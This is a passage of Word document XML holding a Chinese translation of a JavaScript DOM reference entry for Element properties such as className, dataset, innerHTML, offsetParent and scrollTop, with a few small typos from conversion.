        <w:t>元素的类属性是一个由空格分隔的类名列表。本属性允许访问这个列表中的各个元素，同时定义了查询、添加、删除以及切换类名的方法。细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string className</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性代表当前元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的保留字，所以</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性用</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，这个属性名有点误导性，因为</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性通常包含多个类名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>readonly long clientHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long clientWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前元素是根元素（参见</w:t>
      </w:r>
      <w:r>
        <w:t>document.documentElement</w:t>
      </w:r>
      <w:r>
        <w:t>），这两个属性将返回</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>的尺寸，它们是除去滚动条及其他浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>包装</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>chro</w:t>
      </w:r>
      <w:r>
        <w:t>me</w:t>
      </w:r>
      <w:r>
        <w:t>）之外的内部或视口的尺寸。在其他情况下，这两个属性返回元素的内容加上内边距的尺寸。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long clientLeft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long clientTop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这两个属性返回元素的左边框或顶边框的边界到内边距的左边框或顶边界之间的距离，单位为像素。一般情况下这就是左边框或顶边框的宽度，不过如果在元素的左侧或顶部有滚动条的话，这个值也包含对应滚动条的宽度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>CSSStyleDeclaration currentStyle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>专有属性代表应用到当前元素上的所有</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性的级联集合</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>cascaded set</w:t>
      </w:r>
      <w:r>
        <w:t>）。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及更早版本中，可以将它作为标签的</w:t>
      </w:r>
      <w:r>
        <w:t>Window.getComputedStyle()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的替代。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly object dataset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通过为名称以</w:t>
      </w:r>
      <w:r>
        <w:t>"data-"</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀的属性赋值，可以把任意值与任何</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素相关联这个</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>属性是元素的数据（</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>）属性的集合，通过这个属性可以更容易地设置和读取它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性值的行为类似于普通的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这个对象的每一个值对应元素上的一个</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性。如果元素有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>data-x</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，</w:t>
      </w:r>
      <w:r>
        <w:t>datas</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:r>
        <w:t>对象就会有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，并且</w:t>
      </w:r>
      <w:r>
        <w:t>dataset.x</w:t>
      </w:r>
      <w:r>
        <w:t>的值和</w:t>
      </w:r>
      <w:r>
        <w:t>getAttribute("data-x")</w:t>
      </w:r>
      <w:r>
        <w:t>的值相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>查询或设置</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性相当于查询或存储这个元素对应的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符来删除</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环来枚举</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element frstElementChild</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性类似于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>firstChild</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但它忽略</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点，只返回</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。同一个文档</w:t>
      </w:r>
      <w:r>
        <w:t>中任意两个元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>值都应该不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string innerHTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定义当前元素包含的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标签的一个可读写的字符串，不包括当前元素本身的开始及结束标签。查询这个属性将以一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文本字符串的形式返回当前元素的内容，设置这个属性为一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文本字符串，将用该文本的解析表示形式替换当前元素的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly boolean isContentEditable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前元素可编辑，本属性将为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。如果一个元素或它的祖先元素有</w:t>
      </w:r>
      <w:r>
        <w:t>contenteditab</w:t>
      </w:r>
      <w:r>
        <w:t>le</w:t>
      </w:r>
      <w:r>
        <w:t>属性，或者包含它的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>指定</w:t>
      </w:r>
      <w:r>
        <w:t>designMode</w:t>
      </w:r>
      <w:r>
        <w:t>属性，则这个元素可能是可编辑的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string lang</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lang</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，这个属性指定当前元素内容的语言编码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element lastElementChild</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性类似于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>lastChild</w:t>
      </w:r>
      <w:r>
        <w:t>属性，不过它忽略</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点，只返回</w:t>
      </w:r>
      <w:r>
        <w:t>Elements</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string localName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前元素本地的、无前缀的名字。和</w:t>
      </w:r>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:r>
        <w:t>属性不同，如果存在命名空间前缀</w:t>
      </w:r>
      <w:r>
        <w:t>prefix</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:r>
        <w:t>属性会包含这个前缀（对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素而言还会转换为大写）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string namespaceURI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正式定义当前元素的命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，可以为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或者一段类似于</w:t>
      </w:r>
      <w:r>
        <w:t>"http://www.w3.org/1999/xhtml"</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element nextElementSibling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性类似于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>nextSibling</w:t>
      </w:r>
      <w:r>
        <w:t>属性，不过它忽略</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comme</w:t>
      </w:r>
      <w:r>
        <w:t>nt</w:t>
      </w:r>
      <w:r>
        <w:t>节点，只返回</w:t>
      </w:r>
      <w:r>
        <w:t>Elements</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long offsetHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long offsetWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素及其所有内容的高度及宽度，单位为像素，包括元素的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>内边距及边框，但不包括外边距。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long offsetLeft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long offsetTop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当前元素的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>边框的左上角相对于它的</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>容器元素的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element offsetParent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定容器元素，</w:t>
      </w:r>
      <w:r>
        <w:t>offsetLeft</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offsetTop</w:t>
      </w:r>
      <w:r>
        <w:t>将基于这个容器元素定义的坐标系统度量。对大多数元素来说，</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>是包含它们的＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。不过，如果一个元素在一个动态定位的元素中，那个动态定位的元素将是</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>，如果元素在表格中，＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素可能会是</w:t>
      </w:r>
      <w:r>
        <w:t>offsetParent</w:t>
      </w:r>
      <w:r>
        <w:t>。参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.8.5</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string outerHTML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义了当前元素及其子元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>标签。如果设置这个属性的值为一个字符串，这个元素（以及它所有的内容）将</w:t>
      </w:r>
      <w:r>
        <w:t>被新值解析成的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档碎片替代。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly string prefx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素的命名空间前缀。这个值通常为</w:t>
      </w:r>
      <w:r>
        <w:t>n ull</w:t>
      </w:r>
      <w:r>
        <w:t>，除非你正在处理一个使用命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Element previousElementSibling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个属性类似于</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>previousSibling</w:t>
      </w:r>
      <w:r>
        <w:t>属性，不过它忽略</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Comment</w:t>
      </w:r>
      <w:r>
        <w:t>节点，只返回</w:t>
      </w:r>
      <w:r>
        <w:t>Elements</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long scrollHeight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long scrollWidth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素的全部高度及</w:t>
      </w:r>
      <w:r>
        <w:t>宽度，单位为像素。当元素有滚动条时（比如，由于</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>属性），这两个属性与</w:t>
      </w:r>
      <w:r>
        <w:t>offsetHeight</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>offsetWidth</w:t>
      </w:r>
      <w:r>
        <w:t>的不同在于，后两者只简单地返回元素可见部分的尺寸。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long scrollLeft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>long scrollTop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素左边缘或顶边缘滚过的像素数。这两个属性只对带滚动条的元素有用，比如</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>auto</w:t>
